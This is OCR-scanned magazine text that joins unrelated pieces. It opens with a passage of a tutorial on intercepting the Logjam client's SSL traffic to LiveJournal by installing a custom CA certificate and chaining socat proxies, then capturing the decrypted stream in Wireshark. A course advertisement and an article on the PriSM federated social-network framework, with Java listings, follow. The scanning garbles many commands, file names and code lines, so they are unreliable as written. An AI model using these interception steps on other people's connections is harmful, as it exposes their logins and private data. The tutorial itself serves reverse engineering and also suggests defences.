Listing 1. Install Yoyodyne CA certificate 



127.0.2.1 www.livejournal.com 

Now lets do a test run by listening on port 443 
(HTTPS) and forwarding to port 443 (HTTPS) of 
the real www.livejournal.com: 

spencersr@bigboote : ~$ sudo socat -vvv \ OPENSSL- 
LISTEN: 44 3, verif y=0 , fork, key=www. live journal . com- 
keyem, certificate=www. live journal . com- key. pern, 
cafile=Yoyodyne-cacert .pern \ 
OPENSSL : 208 . 93. 0.12 8:443, verif y=0 , fork 

Simple enough. Browsing to https://www.livejour- 
nal.com with w3m and wget should work sucess- 
fully now and a stream of random encrypted infor- 
mation will be printed by socat. 



spencersr@bigboote:~$ sudo mkdir / usr/ share/ ca- certificates I custom 

spencersr@bigboote:~$ sudo cp Yoyodyne- cacert .pern \ / usr / share/ ca- certificates/ custom/ Yoyodyne- cac- 
ert . crt 

spencersr@bigboote:~$ sudo chmod a+rw \ 

I usr I share/ ca- certificates I custom/ Yoyodyne- cacert . crt 

spencersr@bigboote:~$ sudo dpkg- reconfigure -plow ca- certificates -f readline \ ca- certificates con- 
figuration 



Trust new certificates from certificate authorities? 1 

This package installs common CA (Certificate Authority) certificates in / usr / share/ ca- certificates . 
Please select the certificate authorities you trust so that their certificates are installed into 
I etc/ ssl/ certs . They will be compiled into a single / 'etc/ 'ssl/ 'certs/ ' ca- certificates . crt file. 



cacert . org/ cacert . org. crt 
custom/ Yoyodyne- cacert . crt 
debconf . org/ ca . crt 



150. moz ilia/ XRamp_Global_CA_Root . crt 
151 spi-inc.org/spi-ca-2003.crt 
152 . spi-inc. org/ spi-cacert-2008 . crt 

{Enter the items you want to select, separated by spaces.) 

Certificates to activate: 2 

Updating certificates in / etc/ ssl/ certs .. . added, removed; done. 
Running hooks in / etc/ ca- certificates/ update .d. .. . 
Adding debian: Yoyodyne- cacert . pern 
done. 
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Chaining two socat instances together with 
an unencrypted session in the middle 

So far so good! Now we need to have socat con- 
necting to another socat using standard TCP4 pro- 
tocol in order to view the unencrypted data. This 
works by having one socat instance listening on port 
443 (HTTPS) and then forwarding to another socat 
on port 8080 (HTTP) which then forwards on to port 
443 (HTTPS) of the real www.livejournal.com. 

Listing 2. Socat terminal 

> 2012/08/29 00:10:27.527184 length=209 
from= to=208 

POST /interface/ flat HTTP/l.l\r 
Host: www . live journal . com\r 
Content- Type: application/ x-www-form- 

urlencoded\r 
User-Agent: http://logjam.danga.com; martinet 

danga . com\r 
Connection: Keep-Alive\r 
Content-Length: \r 
\r 

> 2012/08/29 00:10:27 .566184 length= 
from= to=231 

ver= &mode=getchallenge< 2012/08/29 

00:10:29 .551570 length-437 
from= to=436 

HTTP/ 1.1 2C 0K\r 
Server: GoatProxy 1.0 \r 
Date: Wed, 29 Aug 2012 08:10:56 GMT\r 
Content-Type: text/plain; charset=UTF- 8\r 
Connection: keep-alive\r 
X-AWS-Id: ws25\r 
Content-Length: \r 
Accept-Ranges: bytes\r 
X-Varnish: 904 353035 \r 
Age : 0\r 

X-VWS-Id: bill-varn21\r 
X-Gateway: bill- swlbl0\r 
\r 

auth_scheme 
cO 

challenge 

cO: 134 6227200: 656: 60: xxxxxx : xxxxxxxxxxxxx 
expire_time 

1346227916 
server_time 
1346227856 
success 
OK 
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Socat instance one: 

spencersr@bigboote : ~$ sudo socat -vvv \ 
OPENSSL-LISTEN:4 43, verify=0, fork, 
key=www. livejournal . corn-key . pern, certificate^ 
www. livejournal . corn-key . pern, cafile=Yoyodyne-cacert . 
pern \ 

TCP4:10. 1.0. 1:8080, fork 

Socat instance two: 



Since by default Wireshark captures all traffic we 
should set up a capture filter that only listens for 
packets on port 8080 of host 127.0.2.1 (Figure 4). 

Once Logjam is run packet will start streaming in 
while Wireshark is recording (Figure 5). 

What now? 

This articles is about viewing unencrypted data in 
an SSL session. Whatever your reverse engineer- 
ing goal is SSL is less of an obstacle now. 



spencersr@bigboote : ~$ sudo socat -vvv \ 
TCP-LISTEN:8080,fork \ 

OPENSSL:208. 93. 0.12 8 : 4 43, verify=0, fork 

Load up Logjam and the socat instances will start 
printing out the stream to the terminal (Listing 2). 

Hurray! You should be dancing at this point. But 
wait, I mentioned using Wireshark before didn't I? 

Using Wireshark to Capture and View the 
Unencrypted Stream 

Now it's time for the easy part. I'm going to as- 
sume that you are comfortable capturing packets 
in Wireshark and focus mainly on the filtering of 
the capture stream. 

Capture 

Interface: lo (loopback) 
IP address: 



127.0.0.1 

::1 



Link-layer header type: Ethernet f T 



0 Capture packets in promiscuous mode 

□ Capture packets in monitor mode 

O Limit each packet to ps! |T| bytes 



Buffer size: \l \t\ megabyte(s) 

Wireless Settings 



gf Capture Filter: port 0080 and host 127.0.2.1 | Compile BPF | 



Htlelp 



% Cancel <9oK 



Figure 4. Wireshark lo (loopback) interface capture window 
with capture filter 



File Edit View Go Capture Analyze Statistics Telephony Tools 




alp 
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Filter: 










No, | Time | Source 




| Protoco 


| Length | Info 




1 O.OQOOOOOOO 127. Q.Q.I 


127.0.2. 1 


TCP 


74 49653 


> http- alt [SYN] Seq=G Win=:— 1 


2 Q . QQ0Q23Q0Q 127. Q. 2.1 

3 0.000037000 127. Q.G.I 

4 0.000960000 127.0.0.1 

5 0.000986000 127.0.2.1 


127.0.0. 1 
127. G. 2. 1 
127.0.2. 1 
127.0.0. 1 


TCP 
TCP 
TCP 


74 http- 
66 49653 
275 [TCP 
66 http- 


alt > 49653 [SYN, ACK] Seq=Q 
> http- alt [ACK] Seq=l Ack=] 
segment of a reassembled PDU] 
alt > 49653 [ACK] Seq=l Ack=; 




7 0.039701000 127.0.2.1 


127. G. 0. 1 


TCP 


66 http- 


alt > 49653 [ACK] Seq=l Ack=; 








66 49655 


> http- alt [SYN] Seq=0 Win=; 
alt > 49655 [SYN, ACK] Seq=0 

> http- alt [ACK] Seq=l Ack=] 


10 1.000504000 127.0.0.1 


127.0.2. 1 


TCP 


12 1.992326000 127.0.0.1 


127.0.2. 1 


TCP 


66 49653 


1.1 200 OK (text/plain) 

> http- alt [ACK] Seq=233 AcM 

> http- alt [FIN, ACK] Seq=2; ,J 










H 


Host: ww. livejournal. com\r\n 
Content -Type : application/x- ww-f or 
User- Agent: http: //logjam. danga.com 
Connection: Keep- Alive\r\n 
t> Content- Length: 23\r\n 


-urlencoded\r\n 


\r\n 






[Full request UFO: http : //ww. liven 




e/flatl 






> Line-based text data: application/x-w 


fw- f orm- urlencoded 








'1 1 _tJ 


0000 00 00 0'"' "" "" '"»"■ "" 00 00 00 00 


00 'OS: 00 45 00 




E. 




0010 GG 4b d3 34 40 00 40 06 67 76 7f 
|0Q20 02 01 cl f5 If 90 bl d3 fa a7 ff 


GG GG Gl 7f 00 
fl ~4 80 18 


K.4@.@. gv. 




i 


Frame (89 bytes) Reassembled TCP (232 bytes) 



How Can SSL be Secure if this Method is so 
Simple? 

SSL and all of the variations of digests and ciphers 
contained within it are pretty reliably secure. Some 
of the major areas this article focused on was the 
ability to fool a client by having the ability to trust a 
new certificate. 

If you are interested in securing your site or cli- 
ent software against this sort of spying I recom- 
mend not using an SSL certificate authority key- 
ring or trust database that is easily modified by the 
user. Including an SSL server certificate in client 
software ,encrypted and protected by a hard cod- 
ed key somewhere in the binary, and requiring it for 
use on SSL connections using a hardened socket 
library will dramatically cut down on the looky-loo 
factor. 

Conclusion 

Thanks to how simple it is to add certificate au- 
thorities to most browsers, mobile devices, and 
custom client software it's a trivial matter to pull 
back the curtain on SSL encrypted streams with 
the right tools. 

Remember to thank your open source hacker 
friends. 



| File: "/tmp ire hark_lo_201208290... :| F v kits: 1 O ; 51 t isplayed: 167351 Marked: 0 Dropped... :| Profile: Default 

Figure 5. Wireshark with captured unencrypted packets 



SHANE R.SPENCER 

1 Shane R. Spencer is based out of 
Anchorage Alaska and has over 
10 years of system administra- 
tion and programming experi- 
ence. Many of his projects are Py- 
thon based and interface with ex- 
ternal services that provide no us- 
able API and communicate over HTTPS only. 
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IT Security Courses and Trainings 

IMF Academy is specialised in providing business information by means of distance 
learning courses and trainings. Below you find an overview of our IT security 

courses and trainings. 



Certified ISO27005 Risk Manager 

Learn the Best Practices in Information 
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How to Build 

a Framework for Organization - Oriented Social 
Networking The PriSM Approach 

The popularity of Online Social Networks (OSN) and social 
media highlights their potential to become the primary 
platform for communication in the workplace and to carry 
out business as well. 



What you will learn... 

• How to define, delegate and enforce access control rules in 
distributed web applications, 

• How to take advantage of the REST protocol for data 
exchange, 

• How to implement a HTTP Push. 



What you should know... 

• The Java programming language, 

• Basic knowledge of the HTTP protocol, 

• Basic knowledge of the REST model, 

• Basic knowledge of GWT's client-server asynchronous 
communication model. 



While they have already been successfully 
embraced for many public relations and 
promotion related activities, existing plat- 
forms like Facebook or Google+ do not (in their 
current form) fit the bill of a platform that can be 
leveraged for managing a business' communica- 
tion, processes or workflows. 

Drawbacks include the lack of flexibility in terms 
of customization and interoperability subject to in- 
tra- and inter-organizational needs as well as am- 
biguities about the content ownership and flow of 
information over such third party platforms. 

In this article, we present PriSM, a framework 
specifically designed and implemented to bring the 
social network communication experience to the 
workplace. This is achieved by realizing a simple, 
secure and scalable platform which eases both 
the access control policy management as well as 
its enforcement in a decentralized and delegated 
fashion, allowing flexible yet controlled intra- as 
well as inter-organizational interactions. 

Online Social Networks: 

A new communication channel 

Online interactions and communication have be- 
come an integral part of our daily life. The emer- 
gence of online social networks (OSN) and Web 
2.0 technologies have further revolutionized and 
ingrained our online activities to the rest of our life. 



It, thus, is natural to utilize such an omnipresent 
paradigm in conducting work related activities as 
well. Nevertheless, the existing infrastructure for 
online social networking is unsuitable for it. Often- 
times organizations may want to retain full control 
and store data and communication, including its 
storage within the organization's own perimeter/in- 
frastructure, and hence would not use a third party 
OSN service. Furthermore, existing OSNs do not 
provide adequate flexibility to customize the de- 
ployment to fit the process and structural peculiar- 
ities of individual organizations. Additionally, akin 
to the use of emails, which inter-operate in a de- 
centralized fashion across different service provid- 
ers, and organizations often control both the logi- 
cal (domain) and physical (servers) components, 
it would be desirable to support communication 
across autonomous social networks (to support in- 
ter-organizational interactions). While approaches 
to federate OSNs have been touted [1], their up- 
take among dominant OSN service providers has 
not occurred. 

As a consequence of a combination of these 
reasons, and possibly others that we overlook 
here, we envision the need of a framework which 
allows the deployment of autonomous social net- 
works that can be administered by and custom- 
ized subject to the needs of individuals or organi- 
zations, along with the ability for communication 
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across such autonomous deployments, support- 
ing flexible, fine-grained and scalable access- 
control policies and their enforcement. In this arti- 
cle, we present the design and implementation of 
PriSM - Private Social Mesh, which brings our vi- 
sion a step closer to the reality by allowing the de- 
ployment of autonomous social networks (ASNs) 
over private clouds or servers (or even avail a 
private instantiation as a service), and creating a 
communication mesh to facilitate inter-ASN inter- 
actions. 

PriSM: A Framework for Creating Social 
Meshes 

We define a social mesh as a network of social 
networks, described next by borrowing some ter- 
minologies from sociology. Figure 1 shows a sim- 
ple instance of a Social Mesh. 

PriSM models what we call a Social Mesh, which 
is a network interconnecting distinct Autonomous 
Social Networks (or ASN for short). An ASN is a 
communication channel officially used by an orga- 
nization and which materializes the structure of the 
organization. The ASN must reflect both the orga- 
nization's policies in terms of information flow and 
permissions and roles of the users. 

The information flow across different users of 
an ASN and across different ASNs is managed 
by means of circles. Namely, a circle consists of 
a group of users of the social mesh - called mem- 
bers - and a set of rules. The members of a circle 
have full access to the information - messages - 
associated to such a circle. On the other hand, a 
user who does not belong to the circle has granted 



access to the information according to the speci- 
fied rules. The rules of a circle are managed by 
members who have been appointed to such a 
task. We call such members boss. 

Different types of circles are required in order 
to represent the different kinds of users' groups 
and sharing needs which may exist. For instance, 
circles representing both the internal structure of 
complex organizations and other circles not direct- 
ly mapping formal structure of an organization are 
needed. We call circles materializing structures of 
an organization as subdomains. Example of sub- 
domains may be departments of a university or 
branches of a company. 

On the other hand, circles representing groups 
created for official purposes, but without a di- 
rect mapping into the organization's structure, 
are called public groups. As an example, a public 
group may be a team of users working on a spe- 
cific project. The project itself may be handled by 
users belonging to different departments of the 
company such as developer from the IT Depart- 
ment (a subdomain) and users from Sales Depart- 
ment (another subdomain). Hence, the main fea- 
ture characterizing a public group is the purpose 
for which it has been created. 

Note that, despite the name "public group", in- 
formation about the group (e.g., membership, con- 
tent, access rights, etc.) actually do not need to 
be public, but it just indicates that anyone is al- 
lowed to create such ad-hoc groups, in contrast 
to subdomains which are administered by individu- 
als with specific (delegated) rights to do so. For in- 
stance, some ASNs may allow users to create and 
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join public groups created for purposes not direct- 
ly work-related, such as a group created to sim- 
plify the communication among the soccer playing 
members of the IT Department Soccer. As op- 
posed to subdomains, members of a public group 
may also belong to different ASNs, such as for a 
project carried out jointly by members of multiple 
organizations. 

Moreover, PriSM allows users to define person- 
alized circles called private groups in which users 
are categorized according to the preferences of 
the creator of the circle. Such private groups are 
strictly confidential to the creator of the circle, and, 
thus, unknown to the users who are categorized. 
Private groups provide a tool to control the flow of 
an individual's messages in a fine-grained manner 
(akin to the use of circles in Google+), for exam- 
ple specifying that a message is visible only to the 
users categorized to a specific private circle. As a 
more "concrete" example, consider a researcher 
working on a project crucial for the company. She/ 
he may create a private group of "untrusted col- 
leagues" to avoid such users from receiving mes- 
sages exchanged within the research team. 

Beside information flow, ASNs require a way 
to manage the privileges of their members. In 
the following we define as privileges the opera- 
tions that a user is allowed to perform in an ASN. 
PriSM uses the roles assigned to users by the 
ASN administrator. In the presented model, a role 
is a job function/title within the organization with 
some associated semantics regarding the author- 
ity and responsibility conferred on a member role. 
We assume that a user may be associated with 
multiple roles, according to the functions she/he 
is performing within the organization. Additional- 
ly, PriSM allows the administrator to further refine 
the privileges available to a given user according 
to "where" she/he is operating. In fact the privi- 
leges granted to a given user at a given moment 
are defined combining the roles to which the user 
has been assigned and the subdomain in which 
she/he is operating. Thus, the subdomains con- 
tribute to identify the available privileges, refining 
the privileges of a role (both granting and revok- 
ing privileges) or even granting/revoking permis- 
sions directly to specific users. 

Table 1 . The group types defined into PriSM's model 



Other than that, a group creator may be inter- 
ested in restricting the membership to the group, 
for example not granting the membership to those 
users who are member of another specific group. 
Furthermore, one may be willing to moderate the 
messages associated with a given group. PriSM 
provides the users the possibility to specify group 
privileges. 

To simplify the management of circles and roles 
management, PriSM allows, and suggests, that 
circles and roles should be organized in a hierar- 
chy. This way a circle will inherit the properties of 
its immediate parent, both with respect to informa- 
tion propagation rules and privileges. 

Table 1 summarizes the characteristics of the 
groups discussed so far. Namely, it shows the 
properties of the different user groups defined in 
the PriSM's social mesh model. 

Online social networks are not only character- 
ized by how users can be arranged into groups 
but also by how it is possible to create relation- 
ships between users. In PriSM we chose a rela- 
tionship model similar to the one implemented in 
Twitter and Google+ rather than the model used 
in Facebook. The main difference is that the re- 
lationships existing in Facebook are bidirectional, 
which means that if Alice is connected to Bob then 
Bob is also connected to Alice. On the other hand, 
in PriSM it is possible to create unidirectional re- 
lationship, which means that if Alice is interested 
in messages created by Bob but Bob is not inter- 
ested in the messages create by Alice, then it is 
possible to create a relationship only from Alice to 
Bob and not vice versa. According to PriSM termi- 
nology we will refer to Alice as a fan of Bob and to 
Bob as an idol of Alice. 

This type of relationships is very useful in sever- 
al contexts where the communication model is not 
necessarily one-to-one or many-to-many but may 
instead be one-to-many. A simple example of such 
communication model is in the universities, where a 
professor creates messages which are interesting 
(or at least should be) for several students. On the 
other hand, the professor is not, in general, inter- 
ested in the messages created by her/his students. 

Other than that, PriSM supports one-to-one com- 
munications using personal messages. Likewise, 
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Circle 
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Public 


Multi-ASNs 


Role 


Yes 






Yes 




SubDomain 


Yes 


Yes 


Yes 


Yes 


No 


Public Group 
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many-to-many can also be realized in PriSM using 
groups. 

PriSM Architecture and Implementation 

In order to provide the services required by an 
ASN, each domain deploys PriSM locally. Figure 
2 shows the architecture of an independent ASN 
deployment comprising several interconnected 
modules. Each module is in charge of managing 
a specific subset of the features provided by the 
system. Many of these features are 'standard' in 
any state-of-the-art on-line social network platform 
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Figure 2. PriSM architecture 



while a few others are novel, specific to PriSM's 
distributed/federated nature and its access and in- 
formation flow controls: 

• User Manager: This module provides an inter- 
face to the operations directly related to the us- 
ers, such as registration, profile management, 
relations and subscription of messages from 
other users, etc. 

• Circle Manager: This component controls the cir- 
cles related information such as the lists of mem- 
bers and the propagation policies for each circle 
other than any relationships between them. 

• Access Control Manager: This module regu- 
lates both the actions performed by the users 
of a PriSM ASN with respect to the privileg- 
es assigned to them by the domains adminis- 
trators and enforces the policies defined in the 
circles. 

• The functionalities of this module are: 

• to store and propagate the messages (and 
content) generated by the ASN's users and 

• to grant access only to those users who are 
allowed according to the rules. 

The PriSM Web Interface exposes the services 
orchestrated by all these constituent modules to 
the ASN users. 

As shown in Figure 2, the PriSM architecture 
consists of another module, which manages the in- 
terconnections between the different ASN instanc- 
es of PriSM. 



Listing 1 . Some methods of the client-side of the remote Interface 

public UserData getUserData (UserlD uid) { 

HttpResponse response = executeGet (String. format ("http: //%s/PriSM/remote/user/%f uid.getDo- 

main(), uid. getUsername ( ) ) ; 
if (2 == response . getStatusLine (). getStatusCode ( ) / 100) 

return mapper . readValue (response . getEntity ( ) . getContent ( ) , UserData . class) ; 
else { 

// handle the error accordingly to the returned status code. 



protected HttpResponse executeGet (String urlQuery) 
HttpClient client = new Def aultHttpClient ( ) ; 
HttpGet getRequest = new HttpGet (urlQuery) ; 

return client . execute (getRequest) ; 

} 
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Remote Interface 

This module is in charge of performing the opera- 
tions of exchanging information with other ASNs. 
For example, the Remote Interface retrieves the 
required data when a user is accessing the profile 
of some user in some other domain. It also sends 
to the interested domains the updates involving 
shared data, such as those regarding the mem- 
bers and/or the policies of shared circles. 

The current implementation of PriSM can be 
downloaded from [7]. It is implemented in Java, 
using GWT [2] for the web-interface. The commu- 
nication between the web-interface and the server 
is done by means of the mechanisms provider by 
the GWT framework. 

On the other hand, the communication between 
the different PriSM modules and between different 
deployments is performed using the REST mod- 
el [4]. The implementation is realized using three 
open-source libraries: HttpClient [4], Jersey [3] 
and Jackson [6]. 



Listing 2. UserManagerService's server-side remote interface 



We chose GWT as the principal framework for 
the development of our prototype because of four 
main reasons: 

• It allows Java programmers to develop effi- 
cient and user-friendly AJAX web-interfaces, 
2. GWT's developer kit is very well integrated 
with Eclipse, making the development and the 
testing of the application simpler for program- 
mers, 

• The JavaScript obtained from the compila- 
tion of the Java source code is optimized for a 
plethora of browsers, relieving the developer 
from that task and 

• The generated code is very efficient and highly 
optimized [9]. 

HttpClient is a library that simplifies the creation 
of network communication using the HTTP pro- 
tocol, which is one of the building blocks of the 
REST model. See Listing 1 for a brief exam- 



@Path("/user/") 

public class User { 
@GET 

@Path ("{username}") 

@Produces (MediaType . APPLICATION_JSON) 

public String getUserlnf o (@PathParam ("username") String username) { 
} 

@PUT 

@Path ("{username}/fan") 

public Response addFan (@PathParam ("username") String idolUsername , @Context HttpServletRequest 
req) { 

} 

@DELETE 

@Path (" {username} /fan/ {f anusername}@ {f andomain}") 

public void deleteFan (@PathParam ("username") String username, @PathParam ("f anusername") String 
fanUsername, @PathParam ("f andomain") String fanDomain) { 

} 

@POST 

@Path ("img/{username}") 

@Consumes (MediaType . MULT I PART_FORM_DATA) 
@Produces (MediaType . TEXT_PLAIN) 

public String updateUserPicture (@PathParam ("username") String username, @ 
FormDataParam ("picture") InputStream pictureStream) { 
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pie. We chose this library because of its stabili- 
ty and for the easiness to access documentation 
and source code examples. HttpClient also sim- 
plifies the creation of PUT and POST requests by 
means of an easy to use interface for the man- 
agement of the message body. 

Talking about request messages' body, we use 
JSON to encode the data exchanged between cli- 
ent and server. Thus, the body of the messages 
and the returned messages are encoded using 
JSON. We chose such a language for data ex- 
change because its definition is less strict and it is 
also lightweight in comparison to other languages 
such as XML. 

Considering that we are using the Java lan- 
guage, we could have used the plain Java serial- 
ization to send and receive data between ASNs. 
We chose differently in order not to limit the im- 
plementations of other PriSM compatible frame- 
works using different programming languages, 
such as C# or Ruby. 

For our implementation, we are using the Jack- 
son library to perform the conversion between 
POJO and JSON objects. As a matter of fact, 
the mapper variable in Listing 1 is exactly an in- 
stance of the ObjectMapper class from the Jack- 
son library. In the client side we use the method 

readValue ( InputStream is, Class<?> type) to deseri- 
alize the JSON object into the corresponding Java 
object. 

On the server side, on the other hand, another 
instance of the ObjectMapper is used to serialize 
from Java objects to JSON objects. This is done by 

invoking the method writeValue (Ob j ect ob j ) . 

The server side of the remote interface has been 
implemented using Jersey. Jersey is an open- 
source library implementing the JSR-331, which 
is the reference specification for building RESTful 
Web services. It uses a series of annotation help- 
ing the developer to interface the methods of dif- 
ferent classes to paths and HTTP methods. The 
actual interface between the user-defined class- 
es and the web is performed by a Jersey Serv- 
let, which will configure itself to call the appropriate 
method for each incoming request. 

Listing 2 shows the interface toward the User- 
Manager module. In particular, it shows the an- 
notations required to specify the paths, the HTTP 
methods and the content type associated with 
each Java method. 

The present PriSM implementation allows com- 
munication between only ASNs which have been 
manually paired by the domains' administrators. 
Paired ASNs are considered trusted in the cur- 
rent model. Additionally, at present we assume 



the existence of a service to correctly discover 
other ASNs and their trustworthiness. These as- 
sumptions need further consideration in future. 
We will also like to note that individual ASN de- 
ployments are free to tweak the constituent mod- 
ules, to add or modify functionalities as deemed 
appropriate. 

Access Control, or How to Define Who Can 
do What 

PriSM supports what we call group and domain 
privileges. The former are those privileges defin- 
ing the actions users can perform within a group, 
such as the privileges of joining the group, to tag 
a message with the current group (which means 
to associate the message to the group, inheriting 
in such a way all group's rules) or the requirement 
of the messages tagged with a group to be moder- 
ated by a boss of the group. The latter are those 
privileges granting to users administrative powers, 
such as the privileges to create public circles, to 
create subdomains, to create roles and so on. 

Group privileges are specific to a group for which 
they are defined, and therefore their enforcement 
is straightforward: once a user is operating in a 
specific group, the group privileges are applied. 

Differently, domain privileges require a more 
complex mechanism to be enforced. Note that the 
PriSM framework manages and enforces access 
control at ASN's level, in the sense that the domain 
privileges are defined in groups characteristics of 
an ASN - such as roles and subdomains - and 
they can be enforced only within the specific ASN. 

The operations a user is granted to perform are 
defined by a combination of her/his roles and the 
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Figure 3. PriSM's access control model 
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Listing 3. The methods for the management of the users' privileges 




@Override 

public Set<Privilege> getRolesPrivileges (UserlD userlD) { 
//admin users will always have the full privileges 
if ( userManager . isAdminUser (user ) ) 

return new HashSet<Privilege> (getPrivilegesList ( ) ) ; 




Set<Privilege> privileges = new HashSet<Privilege> ( ) ; 




try { 

List<CircleID> roles = circleManager . getRolesMembership (userlD) ; 
for (CirclelD role : roles) { 
try { 

privileges . addAll (dataSource . getPrivileges (role, true) ) ; 
} catch (DataSourceException e) { 

logger .error ("Error retrieving the privileges for role" + role); 

} 


} 

} catch (DataSourceException e) { 

logger . error ( "Error retrieving the roles of user " +userID) ; 

} 




return privileges; 

} 




@Override 

public Set<Privilege> getActivePrivileges (Set<Privilege> rolePrivileges, CirclelD circlelD, UserlD 
userlD) { 

Set<Privilege> activePrivileges = new HashSet<Privilege> (rolePrivileges) ; 
//admin users already have all privileges 
if ( userManager . isAdminUser (userlD) ) 
return activePrivileges; 


if ( null != circlelD ) { 
try { 

PrivilegeCacheltem privileges = privilegesCache . getCache ( circlelD) ; 


activePrivileges . addAll (privileges . getGrant ( ) ) ; 

activePrivileges . removeAll (privileges . getRevoke ( ) ) ; 




if (null != privileges . getDelegationGrant (userlD) ) 

activePrivileges . addAll (privileges . getDelegationGrant (userlD) ) ; 




if (null != privileges . getDelegationRevoke (userlD) ) 
activePrivileges . removeAll (privileges . getDelegationRevoke (userlD) ) ; 




} catch (DataSourceException e) { 
logger . error ( "Error retrieving the privileges from the cache 
} 


") ; 


} 

return activePrivileges; 

} 
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subdomain in which she/he is operating. Because 
of that, the PriSM framework enforces access con- 
trol differently according to the action performed by 
the user. 

Role-Based Access Control (RBAC for short) is 
a well-known and well-established access control 
model. In few words, in RBAC the access control 
model maps the privileges to the roles existing 
within an organization and associates such collec- 
tions of privileges to the users. Thus, privileges are 
not associated directly to users but by means of 
roles. 

In PriSM we extended the RBAC model as shown 
in Figure 3. According to our model the privileges 
of a user are defined by the roles of the user com- 
bined with the privileges defined for the "context" in 
which the user is operating. 

More precisely, we associate to each circle 
(which we remind is defined as a group of users 
and a set of rules defining how information is prop- 
agated) a set of privileges to be granted/revoked 
to the user. 

To do that, we compute on the fly the list of avail- 
able privileges each time the user change loca- 
tion within the website. This is done keeping the 
list of privileges from the roles as a session vari- 
able (which we remind is kept on the server) and 
each time the user accesses a location on the 
web-interface we update the list of active privi- 
leges. Listing 3 shows the actual code used to re- 
trieve roles' active privileges. Note that the meth- 
od getActivePriviieges o does not modify the list of 
roles' privileges but operates on a copy of such list. 
This way it is possible to keep one copy of the orig- 
inal list along all the user's session, saving time not 
querying the database. 

Moreover, to retrieve the privileges of a circle 
from the database is a costly operation. To reduce 
such costs in PriSM we exploited two things. First 
of all, we store for each circle/role the privileges 
lists as serialized Java objects, thus, saving the 
time required to build such lists from access con- 
trol matrices or XML files or other kind of serial- 
ization format. Secondly, we take advantage of a 
cache that stores the privileges associated to the 
most recently accessed circles, to further speed up 
the retrieval of such data. 

Of course, we implemented an API to invalidate 
the appropriate cached and session's data when- 
ever a circle's or a role's privilege list is modified. 

Information Flow Management, or Who 
Can Read One's Stuff 

As we mentioned in the introduction, one of the 
key features of PriSM is the possibility for a user to 



share messages with other users operating in dif- 
ferent organizations. We also mentioned that this 
is done while respecting the policies defined by the 
author of the message and the policies of the ad- 
ministrators of the domain to which the author be- 
longs. 

Before we present the implementation of the in- 
formation flow mechanism, let us briefly describe 
how it works. We are not going into the details of 
the policy definition language, let us just define a 
policy as a formula of the form: predi & P red2 & 
P red3 where each P red? is a predicate verifying cer- 
tain properties of the message or of the user read- 
ing the message. 

The policies that have to be applied are chosen 
according to the tags of the message. 

According to the type of the circle the rules may 
be defined by different people. More precisely, by 
people with different roles within the organization. 

Recall that PriSM allows the classification of us- 
ers into different group types, each of them with 
a specific semantic. With respect to information 
propagation, we are interested only in such groups 
that are defined as circles, which means groups 
having associated propagation rules. Thus, we are 
interested only in such groups that are involved in 
the information propagation process. 

A message is associated with two sets of tags: 
the tag set and the conflict set. The former associ- 
ates to the messages to the groups of users that 
are allowed to access the message while the latter 
defines the set of users that are denied access to 
the message. 

In order to read a message a user may belong to 
at least one of the circles in the tag set. 

If it does not, then the user is granted access to 
the message if there exists a succession of circles 
C 1 , C 2 , . . . , C N such that the user satisfies the policy 
of each circle, she/he is member of C N , C 1 is a cir- 




Figure 4. Circle's succession within a hierarchy 
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cle in the tag set and each circle in the succession 
is children of the next according to the circle's hier- 
archy. See Figure 4 for a visual example. 

The conflict set works the opposite way: if a user 
is member of any of the conflict set then she/he is 
denied to read the message. For circles in the con- 
flict set we require only a direct membership. That 
is, if a user is a member of the father (or the child) 
of a circle in the conflict set but not of one in the 
conflict set then she/he is not denied access to the 
message a priori. 

As an example, consider the toy scenario shown 
in Figure 5. The users Bob, Charlie and Ellen are Al- 
ice's fans. Alice is member of the circle C 1 which is 
in turn an inner circle of C 2 . Suppose Alice creates a 
message m and tags it with C 1 and defines no circle 
in the conflict set. As previously explained, Bob is 
allowed to access due to being a member of C r On 
the other hand, the other users will satisfy the poli- 
cies of C 1 to access m. Supposing that both Charlie 
and Elen satisfy such policies, only Charlie will ac- 
cess m because he is a member of C 2 . Hence, Elen 
will be required to satisfy also the policies of C 2 be- 
fore being able to read content from the circle C 2 . 

The primary objective of the PriSM system is to 
allow users to exchange information. In order to 
provide to the users with satisfying experience, the 
architecture of PriSM has been designed to reduce 
the time elapsing between when the information is 
created and when it is actually available to the final 
user. To reduce such latency, PriSM takes advan- 
tage of a push mechanism that sends the messag- 
es created by the users of an ASN to all the ASNs 
of the fans of such users. We recall that we define 
that Alice is a fan of Bob if she is interested in the 
messages created by him. 

Figure 6 shows the steps required to post a mes- 
sage through the system to all the users potentially 




interested in it. First of all, the user sends the mes- 
sage m to the Content Manager (1), which stores 
the message in the local database. 

Afterwards, the Content Manager retrieves the 
set of followers from the User Manager (2). The 
Content Manager requests to the Access Control 
Manager for each local follower user whether the 
user is allowed to access the message (3). 

The verification is performed by Access Control 
Manager according to the tag set, the conflict set, 
the set of circles the designated user is a member 
of and the list of propagation polices. Such infor- 
mation are retrieved by the Access Control Manag- 
er querying the Circle Manager (4). If the verifica- 
tion (3) holds then the Content Manager will notify 
the destination user, immediately if the user is cur- 
rently on-line or delivered in the user's inbox to be 
retrieved as soon as she/he logs into the system 
(9). At the same time, the Content Manager sends 
the set of remote followers to the Remote Interface 
(6) which will, in turn, extract the set of domains to 
be notified of the existence of m (6). 

The action of notifying the remote domains actu- 
ally consists in forwarding m. Therefore, each re- 
mote domain will send the message m to the local 
Content Manager (8) which, in turn, will perform 
the steps (2) to (4), as performed by the Content 
Manager of the original domain, including the final 
notification (9) to the local users. 

We assume each domain to be trusted. It 
means that the Access Control Manager will be- 
have consistently across all ASNs. Moreover, we 
assume that circles' data and messages will be 
replicated among different domains, mainly to re- 
duce the latency of the system. Note that such 
assumptions do not introduce any vulnerability 
substantially different than while using other ex- 
isting modes of electronic communication such 
as email (Figure 6). 
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Figure 6. Message propagation 
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Listing 4a. Frontier-based information flow mechanism: the code 

@Override 

public boolean isContentViewable (UserData user, UserCircle userCircle, Content post) 
throws RemoteDomainNotConnectedException { 
List<CircleID> allCircles = userCircle . getAHCircles () ; 

// check if denied 

for (CirclelD dtag : post . getDeniedTags ( ) ) { 
if (allCircles . contains (dtag) ) { 

logger . info (user . getld ( ) + " is member of a denied circle") ; 
return false; 




for (CirclelD tag : post . getTags ( ) ) { 
CirclelD analyzedCircle = tag; 

do { 

// check if outside or contained 

if (null == analyzedCircle | | allCircles . contains (analyzedCircle) ) { 
return true; 

} 

Action action = ServerConfig . getDefaulAction ( ) ; 

/ / retrieve rule 
try { 

